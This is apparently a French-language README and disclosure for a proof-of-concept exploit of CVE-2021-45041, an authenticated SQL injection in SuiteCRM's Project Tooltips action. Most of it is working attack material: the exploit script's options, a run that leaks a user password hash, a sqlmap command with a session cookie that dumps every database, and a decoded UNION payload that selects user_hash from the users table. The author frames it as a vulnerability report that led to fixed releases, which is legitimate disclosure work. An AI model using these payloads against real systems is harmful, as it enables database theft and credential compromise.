
PoC for CVE-2021-45041
PoC pour CVE-2021-45041 alias SCRMBT-#177 - Injection SQL authentifiée dans SuiteCRM <= 8.0
Options :
(.venv) ➜ CVE-2021-45041 git:(main) ./exploit.py --help
Usage: exploit.py [OPTIONS]
Options:
-h, --host TEXT Root of SuiteCRM installation. Defaults to
http://localhost
-u, --username TEXT Username
-p, --password TEXT password
-c, --col_count INTEGER Number of columns to use in union query. Defaults
to 44
-d, --dbms TEXT DBMs used by SuiteCRM. Defaults to mysql
-d, --is_core BOOLEAN SuiteCRM Core (>= 8.0.0). Defaults to False
--help Show this message and exit.
https://github.com/manuelz120/CVE-2021-45041
Exemple d'utilisation :
(.venv) ➜ CVE-2021-45041 git:(main) ✗ ./exploit.py --host http://localhost --username user --password ******
INFO:CVE-2021-45041:Login did work - Trying to leak user hash to check if SuiteCRM is vulnerable
INFO:CVE-2021-45041:Received the following hash: $2y$10$WTN2aqQOyHUWxBjubqvYrukTOOE.rrfmE4SoogFbv4kc9dXu7vZzq
INFO:CVE-2021-45041:If this doesn't look like a password hash, the exploit might not work correctly
INFO:CVE-2021-45041:Launching sqlmap against target to get full DB dump
INFO:CVE-2021-45041:sqlmap -u 'http://localhost/index.php?module=Project&action=Tooltips&resource_id=test%5C&start_date=%29+*' --headers 'Cookie: PHPSESSID=93b4g4bfd3ak199iiiands8cv8; sugar_user_theme=SuiteP' --technique U --dbms mysql --union-cols=44 --batch --dump-all
___
__H__
___ ___[.]_____ ___ ___ {1.5.12#pip}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:42:51 /2021-12-27/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[21:42:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (NULL) - 44 columns (custom)
Payload: http://localhost:80/index.php?module=Project&action=Tooltips&resource_id=test\&start_date=-8702) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x52736356547967794948526b714b71584c55516679466d45537956795a546d664d74516d54644f41,0x716b767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[21:42:52] [INFO] testing MySQL
[21:42:52] [INFO] confirming MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[21:42:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.51
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[21:42:52] [INFO] sqlmap will dump entries of all tables from all databases now
[21:42:52] [INFO] fetching database names
...
J'ai récemment découvert une injection SQL authentifiée dans SuiteCRM. J'ai pu vérifier la vulnérabilité dans les versions 8.0 et 7.12.1. La vulnérabilité se situe dans l'action Tooltips du module Project. Dans une installation par défaut, tout utilisateur peut appeler cette action en accédant à l'URL suivante (pour la version 8, ajoutez le préfixe /legacy) :
/index.php?module=Project&action=Tooltips&resource_id=test&start_date=test
Si nous vérifions l'implémentation de cette action (voir
https://github.com/salesagility/SuiteCRM-Core/blob/v8.0.0/public/legacy/modules/Project/controller.php#L485-L513), nous pouvons voir que les valeurs sont directement extraites de $_REQUEST sans aucune sanitisation supplémentaire, et utilisées par la suite dans la clause where de la requête.

Bien que nous ne puissions pas utiliser de guillemets simples à cause de l'encodage des entités HTML, cela reste exploitable car il existe plusieurs points d'injection. Si nous spécifions un resource_id se terminant par un antislash (\), le guillemet simple suivant sera échappé, et la chaîne ne sera terminée que par le guillemet simple après le mot-clé BETWEEN. Cela signifie que tout ce que le client envoie comme start_date sera traité comme du SQL pur et peut être utilisé pour mener une attaque par injection SQL.
Voici un PoC minimal qui divulgue le hash du mot de passe d'un utilisateur :
Version 7.12.1 :
Version 8.0 :
Version décodée de l'URL :
module=Project&action=Tooltips&resource_id=test\&start_date=) UNION SELECT 0, 1, 2, 3, 4, (SELECT user_hash from users limit 1), 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43 from dual; #

Peu après mon rapport, de nouvelles versions de SuiteCRM (7.12.2 et 8.0.1) ont été publiées, contenant le correctif suivant :